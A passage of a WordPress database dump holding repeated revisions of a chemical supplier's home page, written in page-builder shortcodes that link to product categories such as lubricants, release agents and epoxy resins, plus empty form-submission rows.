hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built release agent, specialty coating or unique formulation.Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:56:52', '2017-05-27 09:56:52', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4308, 1, '2017-05-27 09:57:22', '2017-05-27 09:57:22', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built release agent, specialty coating or unique formulation.Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:57:22', '2017-05-27 09:57:22', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4309, 1, '2017-05-27 09:58:44', '2017-05-27 09:58:44', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built release agent, specialty coating or unique formulation.Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 09:58:44', '2017-05-27 09:58:44', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4310, 1, '2017-05-27 10:04:19', '2017-05-27 10:04:19', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Custom Solutions</h3>\n<p>Custom-built release agent, specialty coating or unique formulation.Our engineering department can design a solution for your application needs.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Large Inventory</h3>\n<p>Our four fully stocked USA & Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.</p>\n\n[/featured_box]\n\n[/col]\n[col span="3" align="0"]\n\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/featured_box]\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\n\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys™ </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-27 10:04:19', '2017-05-27 10:04:19', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4311, 0, '2017-05-29 00:50:17', '2017-05-29 00:50:17', '', '', '', 'publish', 'closed', 'closed', '', '4311', '', '', '2017-05-29 00:50:17', '2017-05-29 00:50:17', '', 0, 'https://www.miller-stephenson.com/nf_sub/4311/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4312, 0, '2017-05-29 09:31:32', '2017-05-29 09:31:32', '', '', '', 'publish', 'closed', 'closed', '', '4312', '', '', '2017-05-29 09:31:32', '2017-05-29 09:31:32', '', 0, 'https://www.miller-stephenson.com/nf_sub/4312/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4313, 0, '2017-05-29 13:13:26', '2017-05-29 13:13:26', '', '', '', 'publish', 'closed', 'closed', '', '4313', '', '', '2017-05-29 13:13:27', '2017-05-29 13:13:27', '', 0, 'https://www.miller-stephenson.com/nf_sub/4313/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4314, 0, '2017-05-29 14:36:22', '2017-05-29 14:36:22', '', '', '', 'publish', 'closed', 'closed', '', '4314', '', '', '2017-05-29 14:36:22', '2017-05-29 14:36:22', '', 0, 'https://www.miller-stephenson.com/nf_sub/4314/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4315, 1, '2017-05-29 16:36:17', '2017-05-29 16:36:17', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" 